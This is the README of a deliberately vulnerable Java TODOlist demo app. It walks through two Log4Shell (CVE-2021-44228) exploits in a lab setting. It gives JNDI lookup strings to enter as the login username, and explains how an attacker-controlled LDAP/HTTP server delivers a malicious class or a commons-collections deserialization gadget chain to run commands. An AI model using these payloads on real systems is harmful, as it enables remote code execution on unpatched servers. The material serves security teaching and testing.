Skip to content

Latest commit

 

History

History
59 lines (44 loc) · 2.88 KB

README.md

File metadata and controls

59 lines (44 loc) · 2.88 KB
Raw

Log4Shell exploits in TODOlist application

This application contains 2 exploits based on CVE-2021-44228 Both will can be accessed vai de login page. When a login is wrong or unknown the application will print log this using a vulnerable log4j version in the console exposing the user name.

Hack 1 for older Java builds (trustURLCodebase=true)

These are the Java version where com.sun.jndi.ldap.object.trustURLCodebase=true by default. All JDK version up to 6u211, 7u201, 8u191, and 11.0.1 have this. Newer version can also be hacked with this method when manually setting com.sun.jndi.ldap.object.trustURLCodebase=true

Server

Start up the log4shell server

  • go to java-goof/log4shell-goof/log4shell-server
  • Start up the server
    • In the IDE (run /src/main/Server.java)
    • Or use maven mvn exec:java

Hack

After startup of the todolist application go to the login page and login with:

  • Username: ${jndi:ldap://127.0.0.1:9999/Evil} (change the IP and port accordingly if not running on localhost)
  • Password: does not matter

This results in a file written to /tmp/pwned

Explanation

The server starts up

  • jdni server
  • http wer server

The log4j string evolves and connects to the LDAP (controlled by the hacker) the LDAP connect to the HTTP server (controlled by the hacker) and sends back a class file Evil.classs This class file contains the remote code execution (calling the runtime with an arbitrary command) in the getObjectInstance() method that is called when the object is created on the target machine. This only works when the JDK setting com.sun.jndi.ldap.object.trustURLCodebase=true which is the case with older JDK builds by default.

Hack 2 all Java build (including the newest builds)

Server

  • same as in Hack 1

Hack

After startup of the todolist application go to the login page and login with:

  • Username: ${jndi:ldap://127.0.0.1:9999/Commons} (change the IP and port accordingly if not running on localhost)
  • Password: does not matter

This results in a file written to /tmp/pwned-commons

Note: When the using a Docker container with tomcat as described in tomcat-rce hack you can do the following

  • Username: ${jndi:ldap://host.docker.internal:9999/Commons2} (change the IP and port accordingly if not running on localhost)
  • Password: does not matter

This inserts some text to the header file

Explanation

For newer JDK builds, where com.sun.jndi.ldap.object.trustURLCodebase=false the hack method still works when the classes are already on the classpath. This mean we can preform an RCE using Java deserialization. The applications has uses the commons-collections 3.1 library that has known deserialization gadget chain embedded. The LDAP server now returns a serialized version of this gadget chain. Since the classes are already available we can execute a command.